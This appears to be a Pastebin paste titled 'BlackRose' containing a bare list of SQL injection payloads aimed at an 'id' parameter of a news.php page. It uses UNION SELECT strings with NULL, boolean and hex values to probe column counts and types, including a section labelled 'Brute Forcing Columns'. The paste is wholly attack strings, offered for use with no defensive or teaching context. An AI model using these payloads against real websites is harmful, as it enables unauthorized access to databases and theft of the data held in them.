Advertisement
Guest User

BlackRose

a guest
Oct 23rd, 2017
403
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. id=.58'limit 1,1 union select Null,2,3-- -
  2. id=.58'limit 1,1 union select 1,Null,3-- -
  3. id=.58'limit 1,1 union select 1,2,Null-- -
  4.  
  5. id=.58'limit 1,1 union select true,2,3-- -
  6. id=.58'limit 1,1 union select 1,true,3-- -
  7. id=.58'limit 1,1 union select 1,2,true-- -
  8.  
  9. # Brute Forcing Columns #
  10.  
  11. news.php?id=.58'and 0 union select 1111 -- -
  12. news.php?id=.58'and 0 union select 11111,2222-- -
  13. news.php?id=.58'and 0 union select 11111,2222,3333-- -
  14. news.php?id=.58'and 0 union select 11111,2222,3333,4444-- -
  15.  
  16. # multiple queries #
  17.  
  18. id=.58'limit 1,1 union select 0x3023,2,3-- -
  19. id=.58'limit 1,1 union select 1,0x3023,3-- -
  20. id=.58'limit 1,1 union select 1,2,0x3023-- -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement